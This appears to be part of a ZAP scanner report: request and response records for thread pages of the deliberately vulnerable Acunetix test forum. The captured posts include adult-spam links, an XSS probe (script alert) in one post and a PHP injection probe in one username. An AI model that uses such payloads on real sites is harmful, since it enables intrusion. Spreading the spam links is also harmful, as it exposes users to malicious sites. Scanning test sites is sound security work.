Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> 